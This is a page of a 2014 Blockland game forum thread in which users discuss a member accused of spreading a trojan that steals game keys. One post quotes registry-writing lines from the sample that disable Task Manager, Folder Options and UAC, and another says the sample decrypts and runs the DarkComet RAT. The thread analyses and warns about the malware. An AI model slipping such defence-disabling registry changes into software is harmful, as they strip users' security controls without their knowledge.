« previous next »
Pages: 1 2 [3] 4

Author Topic: LSD - Spreading RAT | Claims to have multiple BL slaves | Lot's keys |  (Read 6008 times)

Cassord²

January 10, 2014, 02:33:41 PM
http://forum.blockland.us/index.php?topic=241459.msg6891481#msg6891481
These songs are really good but I don't want to download it because I fear it's got the virus in it.

Ad Bot

Advertisement

SWAT One

January 10, 2014, 02:41:55 PM
Quote from: Zeblote on January 10, 2014, 02:12:58 PM
>>disable LSD's keys and ban by IP.
ftfy

Zeblote

January 10, 2014, 02:47:11 PM
Quote from: SWAT One on January 10, 2014, 02:41:55 PM
ftfy
Because it totally takes more than a few clicks to change your IP.

Blockzillahead

January 10, 2014, 03:22:07 PM
Quote from: Zeblote on January 10, 2014, 02:12:58 PM

I don't believe this is a RAT more than it is a Trojan.
It seems to disable a stuff ton of functions and registries.

Code: [Select]
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
Also writes itself to start up and disables methods of killing it. I think even removing anti-viruses from booting up at start up.

Please revoke this guy and all those stolen keys.

Zanaran2

January 10, 2014, 03:31:15 PM
Quote from: Ravencroft7 on January 10, 2014, 02:19:45 PM
Are you loving joking
whatd you expect guys it was 3 in the morning and my brain was fried

Zeblote

January 10, 2014, 03:49:29 PM
Quote from: Blockzillahead on January 10, 2014, 03:22:07 PM
I don't believe this is a RAT more than it is a Trojan.
It seems to disable a stuff ton of functions and registries.
The main point of the script is to decrypt and execute a copy of darkcoment (and most likely other things too), and to prevent the user from shutting it down.

Zeblote

January 10, 2014, 03:50:56 PM
Quote from: Zeblote on January 10, 2014, 03:49:29 PM
The main point of the script is to decrypt and execute a copy of darkcoment (and most likely other things too), and to prevent the user from shutting it down.
No edit: Here's a simple virustotal check of the decrypted file: https://www.virustotal.com/file/302f038f0a677da3099139721d098d3d87af280a6d744dcf1c491849f95955ab/brown townysis/1389380113/

SWAT One

January 10, 2014, 03:51:12 PM
Quote from: Zeblote on January 10, 2014, 02:47:11 PM
Because it totally takes more than a few clicks to change your IP.
But then it's a federal offense.  If this kid is stupid enough to hand this out and welcome drama, he'd do it again and then be is really deep stuff.

Zeblote

January 10, 2014, 03:58:41 PM
Quote from: SWAT One on January 10, 2014, 03:51:12 PM
But then it's a federal offense.  If this kid is stupid enough to hand this out and welcome drama, he'd do it again and then be is really deep stuff.
Please explain how changing your IP should be a 'federal offense' and how that should matter at all if he doesn't live in the US.

Blockzillahead

January 10, 2014, 03:59:54 PM
Quote from: Zeblote on January 10, 2014, 03:58:41 PM
Please explain how changing your IP should be a 'federal offense' and how that should matter at all if he doesn't live in the US.

I think changing your IP after committing a crime online is a federal offense.
But yeah tough stuff if he doesn't live in the US.

Zeblote

January 10, 2014, 04:11:02 PM
Quote from: Blockzillahead on January 10, 2014, 03:59:54 PM
I think changing your IP after committing a crime online is a federal offense.
But yeah tough stuff if he doesn't live in the US.
Dynamic IPs change all the time... or he could just use a vpn... unless he's a handicap and does this without any precautions.

AutoBahn

January 10, 2014, 06:09:13 PM
Quote from: Cassord² on January 10, 2014, 02:33:41 PM
http://forum.blockland.us/index.php?topic=241459.msg6891481#msg6891481
I want to say Bishop has been hijacked/is linked to LSD as well, since he seems to have downloaded it and he recently posted a few links on my server to a file download that has similar results on a virustotal scan as
Quote from: Zeblote on January 10, 2014, 03:50:56 PM
No edit: Here's a simple virustotal check of the decrypted file: https://www.virustotal.com/file/302f038f0a677da3099139721d098d3d87af280a6d744dcf1c491849f95955ab/brown townysis/1389380113/

Zealott

January 10, 2014, 06:22:08 PM
I'm assuming he is planning to sell them 70% like in Minecraft. I thought that selling BL keys was pretty much impossible because if the IP location constantly changes it would get detected or something?

Truce

January 10, 2014, 06:37:00 PM
Quote from: AutoBahn on January 10, 2014, 06:09:13 PM
I want to say Bishop has been hijacked/is linked to LSD as well, since he seems to have downloaded it and he recently posted a few links on my server to a file download that has similar results on a virustotal scan as

I don't want to accuse him, but maybe they know each other? I saw that when I made that post earlier.

Renderman

January 10, 2014, 06:52:10 PM
Quote
ID: 31337
my id is 33559 :O
Pages: 1 2 [3] 4
« previous next »